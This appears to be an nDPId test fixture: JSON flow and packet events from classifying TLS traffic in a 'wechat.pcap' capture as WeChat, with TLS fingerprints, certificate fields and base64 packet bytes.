-01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167366908,"flow_last_seen":1492167367550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167367550,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167377896,"flow_last_seen":1492167377896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167377896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1492167377896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KM9AAEAGqhzAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT1vHQAAAQEICgAw0kAycerX"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1492167377936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377936,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0Fj0AADQGCA\/YOs2OwKgBZwG7wnvXK\/KwzDlUhIAQAVQWugAAAQEICjJymzYAMHos"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167378674,"flow_last_seen":1492167378674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167378674,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1492167378674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167378674,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8mSRAAEAGfBjAqAFny82XotNOAbtKc0omAAAAAKACchBzmgAAAgQFtAQCCAoAMNMCAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167378926,"flow_last_seen":1492167378926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167378926,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1492167378926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167378926,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cOpAAEAGpFLAqAFny82XotNPAbtxraOrAAAAAKACchDymgAAAgQFtAQCCAoAMNNBAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1492167379033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379033,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG7005qx4IjSnNKJ6ASN8i96gAAAgQFoAQCCApF0b0+ADDTAgEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1492167379034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379034,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0mSVAAEAGfB\/AqAFny82XotNOAbtKc0onaseCJIAQAOUjLAAAAQEICgAw01xF0b0+"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378674,"flow_last_seen":1492167379034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167379034,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1492167379279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379279,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG7009k83t+ca2jrKASN8iurAAAAgQFoAQCCApFrVgaADDTQQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1492167379279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379279,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cOtAAEAGpFnAqAFny82XotNPAbtxraOsZPN7f4AQAOUT8AAAAQEICgAw05lFrVga"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167378674,"flow_last_seen":1492167379396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167379396,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378674,"flow_last_seen":1492167379397,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167379397,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378926,"flow_last_seen":1492167380233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380233,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167380581,"flow_last_seen":1492167380581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167380581,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1492167380581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380581,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8GvtAAEAG+kHAqAFny82XotNQAbtFV84kAAAAAKACchDy2AAAAgQFtAQCCAoAMNTfAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1492167380894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380894,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701DDsQ6LRVfOJaASN8i7gwAAAgQFoAQCCApFrVm2ADDU3wEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1492167380894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167380894,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0GvxAAEAG+kjAqAFny82XotNQAbtFV84lw7EOjIAQAOUg0QAAAQEICgAw1S1FrVm2"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167380581,"flow_last_seen":1492167380894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380894,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167382020,"flow_last_seen":1492167382020,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167382020,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1492167382020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167382020,"pkt":"8IQvSpdgeJKcD6iOCABFAAAokulAAEAGgjbAqAFny82X058kAbutvz98aYB+jlAQAdESKQAA"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1492167382374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1492167382374,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoL8xAAC4G9rPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAQAIMTdgAAAADZK2u8"} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1492167397120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167397120,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePJAAEAGFx3AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO0gQAAAAQEICgAw5QaFnXDI"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167400812,"flow_last_seen":1492167400812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167400812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1492167400812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167400812,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8voBAAEAGVrzAqAFny82XotNRAbuSN1YhAAAAAKACchAKOQAAAgQFtAQCCAoAMOihAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167401063,"flow_last_seen":1492167401063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167401063,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1492167401063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401063,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/z9AAEAGFf3AqAFny82XotNSAbu9GRfgAAAAAKACchAdWQAAAgQFtAQCCAoAMOjfAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1492167401175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401175,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701Ey6mUDkjdWIqASN8j5bgAAAgQFoAQCCApFrW16ADDooQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1492167401175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401175,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0voFAAEAGVsPAqAFny82XotNRAbuSN1YiMuplBIAQAOVesAAAAQEICgAw6PtFrW16"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167400812,"flow_last_seen":1492167401176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167401176,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 